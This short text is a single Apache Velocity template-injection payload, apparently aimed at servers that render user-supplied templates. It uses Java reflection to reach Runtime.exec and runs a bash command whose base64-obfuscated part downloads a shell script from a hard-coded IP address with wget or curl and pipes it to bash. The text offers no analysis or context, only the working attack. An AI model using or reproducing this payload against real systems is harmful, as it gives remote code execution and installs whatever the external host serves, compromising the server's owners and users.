#set($ex=$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec("bash -c {eval,$({tr,/+,_-}<<<KHdnZXQgLU8gLSBodHRwOi8vODkuMjIxLjUyLjEyMi9zLnNoIDI+L2Rldi9udWxsIHx8IGN1cmwgLW8gLSBodHRwOi8vODkuMjIxLjUyLjEyMi9zLnNoICkgfCBiYXNoIA==|{base64,--decode})}"))
#end
